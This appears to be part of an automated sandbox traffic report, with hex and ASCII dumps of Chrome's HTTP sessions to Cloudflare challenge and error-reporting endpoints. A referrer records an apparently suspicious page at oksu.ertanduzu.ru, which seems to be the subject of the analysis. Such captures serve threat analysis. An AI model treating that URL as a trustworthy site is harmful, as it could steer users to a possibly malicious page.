                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC622INData Raw: 77 63 71 64 69 72 36 74 6e 4a 32 2b 6f 73 54 42 6b 39 62 50 74 4e 62 55 32 37 7a 64 6e 64 65 70 6e 4e 50 67 71 38 79 67 6f 74 7a 63 34 4f 47 64 36 65 44 74 32 4c 33 6d 34 74 2f 6f 36 2b 48 6c 38 64 58 78 7a 73 58 4c 38 73 33 6f 39 72 72 79 34 74 6a 62 43 4e 66 53 31 75 58 5a 35 63 62 6a 43 67 77 50 34 39 45 54 39 52 6e 56 38 4f 6b 53 32 77 76 63 31 39 73 64 2f 66 63 57 49 75 45 55 34 79 59 48 47 4f 63 71 48 43 6b 41 4c 76 41 78 38 2f 55 4a 4d 79 49 43 44 6a 6e 36 42 7a 51 2b 48 69 73 4e 46 6b 55 32 4a 7a 77 62 4f 6a 30 46 48 7a 34 35 50 67 4e 46 44 30 67 32 4e 6a 56 56 55 53 6f 71 4a 54 49 31 56 6c 34 5a 51 7a 77 38 55 46 35 65 4f 55 46 63 56 6a 35 47 53 6b 67 2f 52 43 6c 75 53 46 4a 72 59 45 39 71 4c 46 64 79 52 6d 30 31 66 55 39 64 54 6e 56 54 56 6f 67
                                                                                                                                                                                                                                                Data Ascii: wcqdir6tnJ2+osTBk9bPtNbU27zdndepnNPgq8ygotzc4OGd6eDt2L3m4t/o6+Hl8dXxzsXL8s3o9rry4tjbCNfS1uXZ5cbjCgwP49ET9RnV8OkS2wvc19sd/fcWIuEU4yYHGOcqHCkALvAx8/UJMyICDjn6BzQ+HisNFkU2JzwbOj0FHz45PgNFD0g2NjVVUSoqJTI1Vl4ZQzw8UF5eOUFcVj5GSkg/RCluSFJrYE9qLFdyRm01fU9dTnVTVog
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 39 63 65 34 36 65 6e 71 47 50 6f 36 57 64 6d 59 56 37 67 57 4b 62 6a 6f 43 68 6b 59 53 4e 66 61 4f 65 6f 71 39 78 73 4b 2b 55 75 57 2b 34 71 4a 43 2b 6b 4a 61 75 74 58 68 2b 71 61 47 2f 6d 59 65 57 6d 6f 32 4b 6f 4d 58 4f 70 74 53 53 79 4a 43 69 6c 38 65 73 33 4c 4c 5a 31 70 69 66 72 63 4f 2f 72 71 4c 44 74 4c 79 32 77 73 4c 4b 70 65 6d 35 73 64 76 72 35 74 58 4f 77 2f 50 78 31 66 76 51 36 4e 33 71 36 74 69 2b 35 65 2b 2f 34 4d 66 35 35 2f 30 46 32 77 41 4a 43 67 58 4f 42 78 58 4d 7a 65 37 34 45 68 6e 61 2b 2f 51 66 47 76 6b 6a 34 67 77 5a 45 69 4d 67 2f 69 4c 36 47 78 6e 6b 2b 76 77 5a 41 41 6f 78 49 53 77 75 42 67 45 36 45 54 6b 74 4f 43 73 54 4e 6a 34 32 50 79 55 4f 4d 42 70 47 42 7a 56 46 43 30 41 58 48 45 30 77 48 6b 59 72 4e 6b 6f 74 56 79 73 53 4a
                                                                                                                                                                                                                                                Data Ascii: 9ce46enqGPo6WdmYV7gWKbjoChkYSNfaOeoq9xsK+UuW+4qJC+kJautXh+qaG/mYeWmo2KoMXOptSSyJCil8es3LLZ1pifrcO/rqLDtLy2wsLKpem5sdvr5tXOw/Px1fvQ6N3q6ti+5e+/4Mf55/0F2wAJCgXOBxXMze74Ehna+/QfGvkj4gwZEiMg/iL6Gxnk+vwZAAoxISwuBgE6ETktOCsTNj42PyUOMBpGBzVFC0AXHE0wHkYrNkotVysSJ
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 4f 70 48 70 34 66 36 53 66 6d 49 65 45 70 61 53 6a 67 47 69 6b 68 33 4f 44 73 36 79 49 72 34 75 52 71 4c 32 36 73 33 2b 37 64 49 36 4e 75 49 53 61 70 70 32 59 6c 34 6d 63 76 4d 32 34 67 38 75 68 6f 61 76 47 72 70 58 54 6d 71 7a 61 7a 63 6e 65 73 4e 66 4d 34 74 4f 7a 32 75 54 52 6f 4f 43 69 78 36 72 6d 34 65 62 4a 38 4d 32 38 70 39 2b 2f 74 72 6a 79 79 65 62 34 33 37 62 30 33 39 50 53 38 51 63 49 42 2f 6f 43 78 66 33 35 33 4d 6f 46 43 76 33 4e 78 51 49 4d 37 65 55 4c 42 42 72 59 46 74 6e 76 38 78 72 71 48 2f 58 36 34 78 73 4a 49 53 4d 4b 43 52 6f 49 4a 2b 34 4f 4a 51 2f 38 36 78 34 47 4c 7a 45 77 4c 2f 6f 4e 4e 68 30 4e 39 2f 66 34 44 78 49 66 52 69 45 70 4f 77 6f 64 4a 79 46 44 52 6a 30 71 52 69 56 4d 56 45 73 55 4c 30 4a 51 4c 46 42 57 52 78 6f 74 58 44
                                                                                                                                                                                                                                                Data Ascii: OpHp4f6SfmIeEpaSjgGikh3ODs6yIr4uRqL26s3+7dI6NuISapp2Yl4mcvM24g8uhoavGrpXTmqzazcnesNfM4tOz2uTRoOCix6rm4ebJ8M28p9+/trjyyeb437b039PS8QcIB/oCxf353MoFCv3NxQIM7eULBBrYFtnv8xrqH/X64xsJISMKCRoIJ+4OJQ/86x4GLzEwL/oNNh0N9/f4DxIfRiEpOwodJyFDRj0qRiVMVEsUL0JQLFBWRxotXD
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 67 71 4b 42 6d 5a 78 74 62 61 57 63 66 70 4f 4b 6b 59 53 6e 69 32 79 4e 70 61 75 78 74 70 6d 56 75 5a 69 39 65 36 36 34 6b 63 4b 53 6e 49 69 58 78 38 62 50 70 4c 43 6d 73 49 76 49 6b 63 47 74 79 34 32 34 32 62 58 4a 72 36 2f 4e 32 71 54 47 78 4c 66 6e 30 37 50 66 77 73 62 64 7a 61 7a 76 35 75 69 73 37 4f 54 66 73 63 58 45 37 63 7a 31 2b 4c 2f 5a 77 65 44 4d 34 4e 33 6e 41 63 50 79 42 2b 72 61 78 41 37 4f 79 2f 44 51 36 74 48 66 7a 68 6a 53 44 75 34 57 45 75 30 4d 46 4e 66 36 37 75 4c 38 46 39 77 66 38 52 73 56 49 65 77 63 4c 65 38 4e 4c 43 6f 43 4b 51 41 46 37 54 67 4e 4d 78 6f 4a 4e 50 34 5a 46 51 41 34 50 76 6f 6b 41 79 5a 43 50 69 6f 73 4c 6b 51 4c 47 69 5a 53 42 55 55 32 55 46 4d 6e 4c 56 59 34 53 31 6f 74 58 55 34 39 55 6c 74 59 4e 53 56 58 50 53 52
                                                                                                                                                                                                                                                Data Ascii: gqKBmZxtbaWcfpOKkYSni2yNpauxtpmVuZi9e664kcKSnIiXx8bPpLCmsIvIkcGty4242bXJr6/N2qTGxLfn07Pfwsbdzazv5uis7OTfscXE7cz1+L/ZweDM4N3nAcPyB+raxA7Oy/DQ6tHfzhjSDu4WEu0MFNf67uL8F9wf8RsVIewcLe8NLCoCKQAF7TgNMxoJNP4ZFQA4PvokAyZCPiosLkQLGiZSBUU2UFMnLVY4S1otXU49UltYNSVXPSR
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 71 61 6e 63 48 47 72 73 35 61 78 67 72 4b 38 74 37 4e 32 65 70 4f 30 65 4c 2b 31 66 35 52 39 67 72 6d 4b 66 5a 2b 48 6a 71 62 4e 78 35 72 50 78 37 36 73 72 74 43 50 75 5a 58 58 6a 38 6a 63 31 70 33 4c 74 74 4f 63 75 64 72 49 79 75 69 39 36 2b 44 45 34 4d 4f 75 36 71 72 63 33 75 33 6d 74 4d 6e 72 31 64 72 76 31 73 7a 54 38 64 4d 42 42 64 7a 7a 31 37 72 6f 2f 51 50 57 32 67 30 4e 32 4e 77 47 33 39 33 64 35 41 33 51 44 67 58 6f 7a 75 67 41 2f 68 67 50 44 78 66 6b 49 41 66 68 38 68 49 56 46 67 49 58 39 2b 77 68 41 53 58 76 46 75 38 74 46 67 50 76 4f 44 49 64 37 2f 51 6f 4d 54 51 72 44 78 55 44 42 7a 42 49 42 55 55 34 43 69 77 4a 50 6a 73 63 43 77 30 6d 54 6c 51 76 54 6c 46 44 4d 6a 67 58 53 56 4a 50 58 45 77 30 58 47 4a 43 4d 43 68 53 4d 31 39 4e 54 30 4e 43
                                                                                                                                                                                                                                                Data Ascii: qancHGrs5axgrK8t7N2epO0eL+1f5R9grmKfZ+HjqbNx5rPx76srtCPuZXXj8jc1p3LttOcudrIyui96+DE4MOu6qrc3u3mtMnr1drv1szT8dMBBdzz17ro/QPW2g0N2NwG393d5A3QDgXozugA/hgPDxfkIAfh8hIVFgIX9+whASXvFu8tFgPvODId7/QoMTQrDxUDBzBIBUU4CiwJPjscCw0mTlQvTlFDMjgXSVJPXEw0XGJCMChSM19NT0NC
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 42 33 68 62 43 45 64 4b 36 4f 6a 48 74 37 64 4a 53 69 6f 37 4b 43 73 4b 6a 42 71 49 4f 6e 79 73 58 51 70 4b 53 62 6f 36 48 4f 78 36 76 48 31 61 53 6c 74 73 33 51 6e 70 50 61 74 62 33 57 75 74 6a 68 6f 75 4f 36 33 4f 36 73 35 74 6e 61 75 73 48 30 35 37 58 50 36 64 4c 69 30 64 54 39 36 4c 6a 74 2b 62 30 42 7a 74 62 35 2b 74 4c 39 41 75 49 4e 36 51 2f 39 30 4d 34 42 34 42 45 55 47 41 66 70 79 2b 33 71 46 77 67 56 48 66 4c 37 47 2f 6f 5a 42 69 59 58 41 67 4d 6a 33 66 76 73 42 41 6a 74 47 79 55 54 4c 4f 34 4c 4e 54 45 51 39 51 63 79 2b 6a 49 68 4c 52 6f 33 4a 52 62 37 4f 77 63 68 4e 67 55 45 44 41 63 59 52 53 4a 51 52 45 45 72 56 46 68 52 4e 6c 41 6c 4e 53 6b 75 48 79 6b 74 50 53 35 53 54 79 34 38 52 43 67 38 5a 30 31 6e 4b 55 6b 35 51 69 70 55 4c 6b 64 4e 59
                                                                                                                                                                                                                                                Data Ascii: B3hbCEdK6OjHt7dJSio7KCsKjBqIOnysXQpKSbo6HOx6vH1aSlts3QnpPatb3WutjhouO63O6s5tnausH057XP6dLi0dT96Ljt+b0Bztb5+tL9AuIN6Q/90M4B4BEUGAfpy+3qFwgVHfL7G/oZBiYXAgMj3fvsBAjtGyUTLO4LNTEQ9Qcy+jIhLRo3JRb7OwchNgUEDAcYRSJQREErVFhRNlAlNSkuHyktPS5STy48RCg8Z01nKUk5QipULkdNY
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 37 6a 37 69 53 77 4c 71 78 73 72 2b 69 6f 5a 4b 45 78 6f 79 44 75 6f 32 36 73 61 58 44 6a 61 65 65 6a 72 4c 51 31 39 54 51 33 4e 33 58 33 35 7a 65 33 36 48 44 6f 4e 58 53 73 36 4b 6b 76 65 58 72 78 75 58 6f 32 73 6e 50 72 75 48 54 79 73 57 35 36 65 33 56 31 4e 58 6f 76 39 2f 32 33 74 53 38 30 75 54 66 2f 73 59 48 42 39 6a 61 34 38 34 45 45 4e 7a 52 79 41 2f 32 2b 41 33 73 45 66 63 4d 32 78 37 74 38 52 2f 6b 45 2f 73 57 43 69 72 35 2f 41 77 4d 42 51 77 6e 4b 77 55 50 2f 4f 30 4f 4e 43 63 57 38 42 73 52 2b 76 73 4c 48 42 7a 37 41 7a 49 69 2f 6b 45 36 4a 67 55 33 43 6b 55 48 4a 53 51 74 56 45 42 45 4e 68 38 33 4c 6a 46 62 4c 44 6c 4c 47 44 45 74 57 69 35 53 48 46 49 6e 4d 54 52 43 52 6c 78 6c 50 6c 6b 70 53 30 6c 6b 61 53 39 6f 59 33 42 43 62 6e 64 76 58 6c
                                                                                                                                                                                                                                                Data Ascii: 7j7iSwLqxsr+ioZKExoyDuo26saXDjaeejrLQ19TQ3N3X35ze36HDoNXSs6KkveXrxuXo2snPruHTysW56e3V1NXov9/23tS80uTf/sYHB9ja484EENzRyA/2+A3sEfcM2x7t8R/kE/sWCir5/AwMBQwnKwUP/O0ONCcW8BsR+vsLHBz7AzIi/kE6JgU3CkUHJSQtVEBENh83LjFbLDlLGDEtWi5SHFInMTRCRlxlPlkpS0lkaS9oY3BCbndvXl
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 76 62 4f 32 78 72 53 57 6b 36 69 74 6d 37 36 59 6e 4b 48 42 6f 73 57 2b 77 4e 66 46 75 63 37 54 79 62 76 50 76 62 4f 36 77 4d 57 74 75 2b 44 63 33 37 79 37 76 4d 47 6e 35 63 2f 75 72 74 2f 51 34 38 54 4b 74 38 7a 46 77 2f 7a 30 2f 4e 6e 50 38 37 32 2b 33 66 30 41 7a 2f 73 43 2b 4d 50 33 32 50 59 48 34 39 6e 6f 42 77 6e 6c 7a 75 72 6d 41 77 66 59 7a 67 37 72 31 39 77 55 41 77 51 61 49 50 6e 33 4a 69 54 71 34 67 66 32 36 53 30 53 42 75 2f 75 4e 52 59 75 43 67 67 4c 46 79 67 38 43 44 67 53 50 52 73 2f 48 78 42 44 52 50 31 44 53 7a 55 4b 54 67 77 62 4d 46 45 4a 52 55 45 6f 53 54 59 74 55 78 6b 75 53 7a 56 64 46 6c 70 56 46 47 41 37 4d 46 70 44 58 69 4a 55 4e 45 6c 49 53 69 70 52 58 46 78 6f 4c 47 4e 4f 63 30 67 32 55 58 70 32 64 7a 5a 70 62 6a 68 50 58 58 68
                                                                                                                                                                                                                                                Data Ascii: vbO2xrSWk6itm76YnKHBosW+wNfFuc7TybvPvbO6wMWtu+Dc37y7vMGn5c/urt/Q48TKt8zFw/z0/NnP872+3f0Az/sC+MP32PYH49noBwnlzurmAwfYzg7r19wUAwQaIPn3JiTq4gf26S0SBu/uNRYuCggLFyg8CDgSPRs/HxBDRP1DSzUKTgwbMFEJRUEoSTYtUxkuSzVdFlpVFGA7MFpDXiJUNElISipRXFxoLGNOc0g2UXp2dzZpbjhPXXh
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 73 61 4b 77 71 32 72 70 71 2f 42 73 4b 7a 48 69 62 4c 58 79 72 66 61 7a 64 62 54 7a 71 44 53 74 38 37 52 76 39 58 68 77 61 43 31 72 4f 58 4f 35 39 32 6f 71 63 54 6a 79 72 2f 4d 73 4f 76 6f 30 4e 7a 55 35 72 47 39 33 2f 48 5a 30 50 62 43 39 39 6e 52 2f 51 61 2b 44 63 58 59 36 52 48 75 2f 65 62 30 33 39 55 4f 32 52 6f 54 2b 64 50 5a 43 64 30 4c 2b 42 41 66 33 41 44 66 35 50 30 6f 39 50 33 38 35 68 30 5a 4c 51 55 67 46 44 4d 73 37 66 59 7a 42 51 67 46 43 76 37 78 2b 54 49 75 47 41 4c 39 4c 78 41 2f 49 78 4d 37 49 53 41 61 50 6a 73 67 48 79 77 6c 44 6a 4a 57 4b 78 5a 50 46 7a 4d 6d 46 68 35 42 53 31 51 76 48 53 4a 52 59 44 64 72 4e 6d 45 71 59 31 68 44 58 47 42 4a 64 47 73 32 5a 33 52 69 63 32 35 5a 54 58 68 57 56 6d 6c 52 59 33 67 33 57 6e 78 78 64 49 47 48
                                                                                                                                                                                                                                                Data Ascii: saKwq2rpq/BsKzHibLXyrfazdbTzqDSt87Rv9XhwaC1rOXO592oqcTjyr/MsOvo0NzU5rG93/HZ0PbC99nR/Qa+DcXY6RHu/eb039UO2RoT+dPZCd0L+BAf3ADf5P0o9P385h0ZLQUgFDMs7fYzBQgFCv7x+TIuGAL9LxA/IxM7ISAaPjsgHywlDjJWKxZPFzMmFh5BS1QvHSJRYDdrNmEqY1hDXGBJdGs2Z3Ric25ZTXhWVmlRY3g3WnxxdIGH


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                64192.168.2.114990035.190.80.14436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:10 UTC536OUTOPTIONS /report/v4?s=Kllo37THIMGIsEktpkFIODih6hoCQ%2BdE%2BD8mDLXcWZdqQnNvqMX3zHKDtnNmN2REPiY%2FNb7fy0luMhC7nDKEeOy4mdSqQXvAtrA4qt1hRU5OaHvhi9Nznasxy1arDQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://oksu.ertanduzu.ru
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:10 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                date: Fri, 20 Dec 2024 15:46:10 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                65192.168.2.1149906104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:11 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:12 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-out: eaa5nb0dMsfnbhbtORCzEtj9es6Vx9hWf1U=$bzLHb/935BOHJP/W
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c389aa090f88-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                66192.168.2.114990735.190.80.14436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC476OUTPOST /report/v4?s=Kllo37THIMGIsEktpkFIODih6hoCQ%2BdE%2BD8mDLXcWZdqQnNvqMX3zHKDtnNmN2REPiY%2FNb7fy0luMhC7nDKEeOy4mdSqQXvAtrA4qt1hRU5OaHvhi9Nznasxy1arDQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 433
                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC433OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 30 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 6b 73 75 2e 65 72 74 61 6e 64 75 7a 75 2e 72 75 2f 67 6b 35 39 41 67 70 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 34 2e 32 33 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                                                                                                                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":901,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://oksu.ertanduzu.ru/gk59Agp/","sampling_fraction":1.0,"server_ip":"172.67.134.231","status_code":404,"type":"http.error"},"type":"network-err
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                date: Fri, 20 Dec 2024 15:46:12 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                67192.168.2.1149908104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:12 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYk HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:13 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:12 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c38ec9c57d00-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 30 08 02 00 00 00 5f 51 87 d6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR0_QIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                68192.168.2.1149914104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:14 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYk HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:14 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:14 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3993ba77ce2-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 30 08 02 00 00 00 5f 51 87 d6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR0_QIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                69192.168.2.1149915104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:14 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f50c3606cea43b9/1734709569717/363a0ee5f22899df8d36d93aabc0f17f0a2db9459887d40a787601e0df99dc4e/1ElR6flOiKuTwDM HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:15 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 1
